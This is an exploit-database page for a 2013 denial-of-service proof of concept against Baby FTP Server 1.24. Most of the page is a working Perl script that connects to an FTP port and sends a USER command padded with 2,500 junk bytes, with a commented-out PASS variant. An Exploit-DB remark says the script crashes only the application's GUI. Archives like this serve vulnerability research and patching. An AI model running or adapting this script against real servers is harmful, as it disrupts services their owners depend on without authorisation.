header-logo
Suggest Exploit
vendor:
Baby FTP Server
by:
Chako
N/A
CVSS
N/A
Denial of Service
N/A
CWE
Product Name: Baby FTP Server
Affected Version From: 1.24
Affected Version To: 1.24
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2013

Baby FTP Server Version 1.24 Denial Of Service

A bug discovered in Baby FTP Server Version 1.24 allows an attacker to cause a Denial of Service using a specially crafted request(USER, PASS...etc).

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Note from Exploit-DB (thanks @wireghoul): This PoC only crashes the GUI for the application, 
# not the server itself.
#
###################################################################
#
# Exploit Title: Baby FTP Server Version 1.24 Denial Of Service
# Date: 2013/6/25
# Exploit Author: Chako
# Vendor Homepage: http://www.pablosoftwaresolutions.com/html/baby_ftp_server.html
# Software Download Link: http://www.pablosoftwaresolutions.com/files/babyftp.zip
# Version: 1.24
# Tested on: Windows 7
# Description:
#       A bug discovered  in Baby FTP Server Version 1.24 allows an attacker
#       to cause a Denial of Service using a specially crafted request(USER, PASS...etc).
#
################################################################### 
use IO::Socket;
 
$TARGET = "127.0.0.1";
$PORT   = 21;
$JUNK = "\x41" x 2500;
 
$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";

 
$SOCKET = IO::Socket::INET->new(Proto=>'TCP', 
                                PeerHost=>$TARGET, 
								PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";
 
$SOCKET->send($PAYLOAD);
 
close($SOCKET);